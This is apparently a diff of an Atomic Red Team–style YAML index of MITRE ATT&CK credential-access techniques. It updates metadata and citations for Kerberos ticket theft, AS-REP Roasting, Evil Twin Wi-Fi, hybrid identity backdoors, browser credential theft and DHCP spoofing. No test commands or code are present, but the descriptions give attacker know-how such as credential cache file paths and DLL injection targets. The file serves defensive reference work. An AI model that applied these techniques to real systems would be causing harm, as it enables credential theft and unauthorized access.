-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -45870,6 +46543,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -45877,32 +46557,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -45938,7 +46654,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -45963,13 +46679,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -45978,14 +46687,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -46007,23 +46708,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -46074,12 +46766,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -46091,6 +46782,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -46105,18 +46797,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -46139,37 +46831,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -46177,9 +46947,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -46188,21 +46958,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -46242,55 +47013,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -46320,6 +47046,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -46329,23 +47061,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -46382,23 +47149,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -46431,21 +47198,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
